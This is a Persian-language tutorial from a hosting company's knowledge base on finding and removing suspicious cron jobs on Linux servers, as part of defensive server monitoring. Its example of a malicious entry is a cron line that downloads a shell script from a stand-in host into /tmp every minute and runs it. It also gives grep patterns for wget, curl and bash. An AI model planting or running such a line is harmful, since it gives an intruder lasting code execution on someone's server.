دانشنامه مارال هاست دانشنامه مارال هاست
  • صفحه اصلی
  • مقالات
    • هاست اشتراکی
    • دامنه
    • سرور مجازی
    • کنترل پنل سی‌پنل
    • کنترل پنل پلسک
    • کنترل پنل دایرکت ادمین
    • ایمیل
    • CloudLinux
    • Cloudflare
  • تماس با ما
دانشنامه مارال هاست دانشنامه مارال هاست
دانشنامه مارال هاست دانشنامه مارال هاست
  • صفحه اصلی
  • مقالات
    • هاست اشتراکی
    • دامنه
    • سرور مجازی
    • کنترل پنل سی‌پنل
    • کنترل پنل پلسک
    • کنترل پنل دایرکت ادمین
    • ایمیل
    • CloudLinux
    • Cloudflare
  • تماس با ما
امنیت
  • Folder icon closed Folder open iconCIA Triad چیست؟ آشنایی با سه اصل اساسی امنیت اطلاعات
  • Folder icon closed Folder open iconAttack Surface چیست؟ آشنایی با سطح حمله در امنیت سایبری
  • Folder icon closed Folder open iconThreat چیست؟ آشنایی با مفهوم تهدید در امنیت سایبری
  • Folder icon closed Folder open iconVulnerability چیست؟ آشنایی با آسیب‌پذیری در امنیت سایبری
  • Folder icon closed Folder open iconExploit چیست؟ آشنایی با مفهوم اکسپلویت در امنیت سایبری
  • Folder icon closed Folder open iconRisk چیست؟ آشنایی با مفهوم ریسک در امنیت سایبری
  • Folder icon closed Folder open iconCVE چیست؟ آشنایی با سیستم شماره‌گذاری آسیب‌پذیری‌های امنیتی
  • Folder icon closed Folder open iconCVSS چیست؟ آشنایی با سیستم امتیازدهی آسیب‌پذیری‌های امنیتی
  • Folder icon closed Folder open iconبعد از خرید سرور مجازی لینوکس(VPS)، اولین کارهایی که باید انجام دهید
  • Folder icon closed Folder open iconآموزش تغییر Hostname سرور در لینوکس
  • Folder icon closed Folder open iconآموزش تنظیم صحیح Timezone و NTP در لینوکس
  • Folder icon closed Folder open iconآموزش بروزرسانی کامل سیستم‌عامل لینوکس همه توزیع ها
  • Folder icon closed Folder open iconآموزش ساخت کاربر جدید و حذف استفاده روزمره از Root در لینوکس
  • Folder icon closed Folder open iconآموزش تنظیم صحیح sudo در لینوکس
  • Folder icon closed Folder open iconآموزش تنظیم Banner ورود به SSH در لینوکس
  • Folder icon closed Folder open iconآموزش مدیریت Password Policy در لینوکس
  • Folder icon closed Folder open iconآموزش نصب و راه‌اندازی SSH Key Authentication در لینوکس
  • Folder icon closed Folder open iconآموزش غیرفعال کردن ورود مستقیم Root از طریق SSH
  • Folder icon closed Folder open iconتغییر پورت SSH؛ آیا واقعاً امنیت سرور را افزایش می‌دهد؟
  • Folder icon closed Folder open iconآموزش محدود کردن کاربران مجاز SSH در لینوکس
  • Folder icon closed Folder open iconآموزش محدود کردن دسترسی SSH بر اساس IP در لینوکس
  • Folder icon closed Folder open iconآموزش تنظیم LoginGraceTime در SSH؛ کاهش زمان انتظار برای احراز هویت
  • Folder icon closed Folder open iconآموزش تنظیم MaxAuthTries در SSH؛ محدود کردن تعداد تلاش‌های ورود ناموفق
  • Folder icon closed Folder open iconآموزش بررسی لاگ‌های SSH در لینوکس
  • Folder icon closed Folder open iconآموزش عیب‌یابی مشکلات SSH در لینوکس
  • Folder icon closed Folder open iconآموزش کامل UFW در لینوکس؛ راه‌اندازی، مدیریت و ایمن‌سازی فایروال سرور
  • Folder icon closed Folder open iconnftables چیست؟ آشنایی با فایروال نسل جدید لینوکس و جایگزین iptables
  • Folder icon closed Folder open iconآموزش کامل Firewalld در لینوکس
  • Folder icon closed Folder open iconآموزش کامل ConfigServer Security & Firewall (CSF)
  • Folder icon closed Folder open iconآموزش مشاهده Loginهای اخیر در لینوکس
  • Folder icon closed Folder open iconآموزش بررسی پردازش‌های مشکوک در لینوکس
  • Folder icon closed Folder open iconآموزش بررسی Cron Jobهای مشکوک در لینوکس
  • Folder icon closed Folder open iconآموزش کامل Fail2Ban در لینوکس؛ نصب و راه‌اندازی
  • Folder icon closed Folder open iconآموزش نصب RKHunter در لینوکس
  • Folder icon closed Folder open iconآموزش نصب Chkrootkit در لینوکس
  • Folder icon closed Folder open iconآموزش اسکن سرور با RKHunter و Chkrootkit
  • Folder icon closed Folder open iconآموزش نصب، پیکربندی و اسکن سرور با AIDE در لینوکس
  • Folder icon closed Folder open iconآموزش نصب، پیکربندی و استفاده از Auditd در لینوکس
  • Folder icon closed Folder open iconآموزش نصب، اسکن و تحلیل امنیت سرور با Lynis در لینوکس
  • Folder icon closed Folder open iconآموزش نصب، بروزرسانی و اسکن سرور با ClamAV در لینوکس
  • Folder icon closed Folder open iconآموزش Hardening وب‌سرور Nginx
  • Folder icon closed Folder open iconآموزش Hardening وب‌سرور Apache
  • Folder icon closed Folder open iconآموزش Hardening PHP
  • Folder icon closed Folder open iconآموزش Hardening پایگاه داده MySQL
  • Folder icon closed Folder open iconآموزش Hardening سرویس Redis
  • Folder icon closed Folder open iconآموزش Hardening سرویس Docker
  • Folder icon closed Folder open iconآموزش Hardening سرویس FTP
امنیت

آموزش بررسی Cron Jobهای مشکوک در لینوکس

آموزش بررسی Cron Jobهای مشکوک در لینوکس

مقدمه

یکی از روش‌های رایج مهاجمان برای حفظ دسترسی به یک سرور آلوده، استفاده از Cron Job است. مهاجم می‌تواند یک اسکریپت مخرب را به‌گونه‌ای زمان‌بندی کند که هر چند دقیقه یا هر بار پس از راه‌اندازی سیستم به‌صورت خودکار اجرا شود.

به همین دلیل، بررسی منظم Cron Jobها یکی از مهم‌ترین اقدامات در مانیتورینگ امنیتی و عیب‌یابی سرورهای لینوکسی است.

در این مقاله با ساختار Cron، محل ذخیره Cron Jobها، روش بررسی آن‌ها و نحوه شناسایی وظایف مشکوک آشنا خواهید شد.


Cron Job چیست؟

Cron یکی از سرویس‌های قدیمی لینوکس برای اجرای خودکار دستورات در زمان‌های مشخص است.

از Cron می‌توان برای مواردی مانند:

  • تهیه نسخه پشتیبان
  • اجرای اسکریپت‌ها
  • بروزرسانی سیستم
  • ارسال ایمیل
  • پاک‌سازی فایل‌ها

استفاده کرد.

اما همین قابلیت می‌تواند توسط مهاجمان نیز سوءاستفاده شود.


چرا Cron Jobها اهمیت دارند؟

در بسیاری از نفوذها، مهاجم پس از اجرای یک Web Shell یا بدافزار، یک Cron Job ایجاد می‌کند تا:

  • فایل حذف‌شده را دوباره دانلود کند.
  • بدافزار را مجدداً اجرا کند.
  • ارتباط با سرور فرماندهی (C2) را حفظ کند.
  • اطلاعات را به خارج از سرور ارسال کند.

مشاهده Cron Job کاربر فعلی

برای مشاهده Cron Jobهای کاربر فعلی:

crontab -l

مشاهده Cron Job یک کاربر دیگر

برای مثال:

sudo crontab -u maraladmin -l

مشاهده Cron Job کاربر Root

sudo crontab -u root -l

این بخش یکی از اولین محل‌هایی است که باید بررسی شود.


محل ذخیره Cron Jobها

علاوه بر Crontab کاربران، لینوکس از مسیرهای مختلفی برای اجرای وظایف زمان‌بندی‌شده استفاده می‌کند.

مهم‌ترین آن‌ها:

/etc/crontab
/etc/cron.d/
/etc/cron.hourly/
/etc/cron.daily/
/etc/cron.weekly/
/etc/cron.monthly/

مشاهده فایل اصلی Cron

cat /etc/crontab

مشاهده تمام فایل‌های Cron

ls -lah /etc/cron.*

مشاهده Cron کاربران

در بسیاری از توزیع‌ها:

ls -lah /var/spool/cron/

یا:

ls -lah /var/spool/cron/crontabs/

جستجوی دستور wget

یکی از رایج‌ترین نشانه‌های آلودگی:

grep -R "wget" /etc/cron* /var/spool/cron* 2>/dev/null

جستجوی curl

grep -R "curl" /etc/cron* /var/spool/cron* 2>/dev/null

جستجوی Bash

grep -R "bash" /etc/cron* /var/spool/cron* 2>/dev/null

جستجوی Python

grep -R "python" /etc/cron* /var/spool/cron* 2>/dev/null

چه Cron Jobهایی مشکوک هستند؟

موارد زیر معمولاً نیاز به بررسی دارند:

  • دانلود فایل از اینترنت
  • اجرای فایل از /tmp
  • اجرای فایل از /dev/shm
  • ارتباط با IP ناشناس
  • استفاده از Base64
  • اجرای Shellهای ناشناس
  • اجرای اسکریپت هر یک دقیقه

نمونه مشکوک

* * * * * wget http://malicious.example/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh

این دستور هر دقیقه فایل مخربی را دانلود و اجرا می‌کند.


بررسی زمان‌بندی‌های غیرعادی

برای مثال:

* * * * *

اجرای هر دقیقه.

یا:

*/2 * * * *

هر دو دقیقه.

اگر این دستورات برای سرویس‌های ناشناس باشند، باید بررسی شوند.

آموزش بررسی Cron Jobهای مشکوک در لینوکس

بررسی مالک فایل‌ها

ls -lah /etc/cron.d/

بررسی کنید فایل‌ها متعلق به کاربر صحیح باشند.


بررسی فایل اجرایی

اگر Cron اسکریپتی را اجرا می‌کند:

ls -lah /path/script.sh

سپس محتویات آن را بررسی کنید.


بررسی لاگ Cron

در Ubuntu و Debian:

grep CRON /var/log/syslog

در AlmaLinux و Rocky Linux:

grep CRON /var/log/cron

بررسی سرویس Cron

در Ubuntu:

sudo systemctl status cron

در RHEL:

sudo systemctl status crond

حذف Cron Job

برای ویرایش:

crontab -e

پس از حذف دستور مشکوک، فایل را ذخیره کنید.


حذف Cron کاربر دیگر

sudo crontab -u username -e

اگر Cron دوباره ایجاد شد

اگر پس از حذف، دوباره ظاهر شد، احتمالاً توسط یکی از موارد زیر ایجاد می‌شود:

  • بدافزار
  • Web Shell
  • Systemd Service
  • اسکریپت Startup
  • نفوذگر فعال

در این شرایط باید منبع اصلی آلودگی پیدا شود.


ابزارهای مکمل

برای بررسی بهتر:

  • systemctl
  • journalctl
  • ps
  • lsof
  • auditd
  • rkhunter
  • chkrootkit

اشتباهات رایج

برخی از خطاهای متداول عبارت‌اند از:

  • حذف Cron بدون بررسی فایل اجرایی
  • نادیده گرفتن Cronهای Root
  • بررسی نکردن /etc/cron.d
  • حذف Cron بدون بررسی علت ایجاد آن
  • بررسی نکردن لاگ‌های Cron

بهترین روش‌ها

برای افزایش امنیت:

  • Cron کاربران را به‌صورت دوره‌ای بررسی کنید.
  • از اجرای اسکریپت‌ها در /tmp جلوگیری کنید.
  • Cronهای Root را مرتب بازبینی کنید.
  • لاگ‌های Cron را مانیتور کنید.
  • فایل‌های اجرایی Cron را نیز بررسی کنید.
  • از ابزارهایی مانند Auditd برای ثبت تغییرات استفاده کنید.

چک‌لیست

در بررسی Cron Jobها، موارد زیر را کنترل کنید:

  • Cron کاربران بررسی شده است.
  • Cron کاربر Root بررسی شده است.
  • مسیرهای /etc/cron.* بررسی شده‌اند.
  • اسکریپت‌های اجرایی تحلیل شده‌اند.
  • دانلود فایل از اینترنت وجود ندارد.
  • وظایف زمان‌بندی‌شده مشکوک حذف یا بررسی شده‌اند.

جمع‌بندی

Cron Jobها یکی از رایج‌ترین روش‌های حفظ دسترسی (Persistence) پس از نفوذ به سرورهای لینوکسی هستند. مهاجمان می‌توانند با ایجاد وظایف زمان‌بندی‌شده، بدافزارها یا اسکریپت‌های مخرب را به‌صورت دوره‌ای اجرا کرده و حتی پس از حذف فایل‌های آلوده، آن‌ها را دوباره ایجاد کنند.

بررسی منظم crontab کاربران، فایل /etc/crontab، مسیرهای cron.* و لاگ‌های سرویس Cron، در کنار مانیتورینگ پردازش‌ها و سرویس‌های فعال، نقش مهمی در شناسایی سریع فعالیت‌های مشکوک و حفظ امنیت سرور ایفا می‌کند.

کیان پور

هنوز نیاز به کمک دارید؟

آیا سوالی دارید؟

آیا این مقاله برای شما مفید بود؟ بله خیر

نظرات خود را بنویسید... لغو پاسخ

اشتراک گذاری این مقاله

آموزش بررسی Cron Jobهای مشکوک در لینوکس

کپی کردن لینک

Clipboard Icon

جدیدترین مقالات

آموزش نصب و راه‌اندازی RustDesk Server با Docker
آموزش نصب و راه‌اندازی RustDesk Server با Docker
2 minutes جولای 2, 2026
آموزش نصب و راه‌اندازی Matrix Synapse + Element Web + Coturn با Docker روی ...
4 minutes جولای 2, 2026
CXS چیست و چگونه کار می‌کند
1 minute می 3, 2026
ساخت سرور چت المنت بروی لینوکس
5 minutes آوریل 25, 2026
Geo Routing و Geo DNS
2 minutes آوریل 22, 2026

تقویم

آگوست 2026
شیدسچپج
1234567
891011121314
15161718192021
22232425262728
293031 
« جولای    

عضویت

جدیدترین پست‌ها

آموزش نصب و راه‌اندازی RustDesk Server با Docker
آموزش نصب و راه‌اندازی RustDesk Server با Docker
2 minutes جولای 2, 2026
آموزش نصب و راه‌اندازی Matrix Synapse + Element Web + Coturn با Docker روی Ubuntu 24.04
4 minutes جولای 2, 2026
CXS چیست و چگونه کار می‌کند
1 minute می 3, 2026
ساخت سرور چت المنت بروی لینوکس
5 minutes آوریل 25, 2026
Geo Routing و Geo DNS
2 minutes آوریل 22, 2026

سلام